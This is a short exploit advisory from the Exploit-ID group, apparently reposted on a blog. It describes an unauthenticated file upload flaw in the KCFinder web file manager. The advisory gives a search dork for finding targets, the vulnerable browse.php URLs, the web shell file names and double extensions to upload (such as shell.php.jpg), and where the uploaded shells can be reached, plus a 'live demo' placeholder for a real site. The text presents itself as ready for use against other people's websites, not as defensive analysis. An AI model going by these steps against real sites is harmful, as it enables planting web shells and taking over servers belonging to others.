Laman

Menu

14 Jun 2011

CKSource KCFinder <= File Upload Vulnerability 

=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/
   Exploit-ID is the Exploit Information Disclosure
 
Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com             
 
                  #########################################
               I'm Z190T, member of Exploit-Id
      #########################################
======================================================================
 
[x] Title : "CKSource KCFinder <= File Upload Vulnerability"
[x] Author : Z190T
[x] Contact : mahruz.id[at]gmail[at]com
[x] Vendor : http://kcfinder.sunhater.com/
[x] Platform : PHP and asp
[x] dork : /kcfinder/browse.php
[x] Tested on : Windows XP sp3 Ar & Linux
 
**** Notice ****
KCFinder is an alternative to the CKFinder web file manager.
It can be integrated into FCKeditor, CKEditor, and TinyMCE WYSIWYG web editors
to upload and manage img,Flash, and other files that can be embedded in an editor's generated HTML content.
 
**** Exploit Details ****
- http://[localhost]/kcfinder/browse.php
- http://[localhost]/[ketahuan]/kcfinder/browse.php
 
**** Attachtement ****
- http://[localhost]/kcfinder/browse.php?type=files&dir=/ <== for anything Files
- http://[localhost]/kcfinder/browse.php?type=images&dir=/ <== for anything Images
- Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,, [txt] extentions!!
 
**** Preview ****
- You can see there!! "0r"
- http://[localhost]/[ketahuan]/kcfinder/upload/files/[g0 a HACK]
 
**** Live Demo ****
- http://[lagi-nyari]/js/kcfinder/browse.php
 
======================================================================
 
[ Thx TO ]
 
[x] All member of EXPLOIT-ID.com, ungu.com, THK-forumo.org, etc...
[x] temen yang saya banggakan : haX0r.x0x, Surabaya Getar, kaMtiEz, eXeSoul, Caddy-Dz, KedAns-Dz, metasploit, KnocKout, etc...
 
======================================================================
at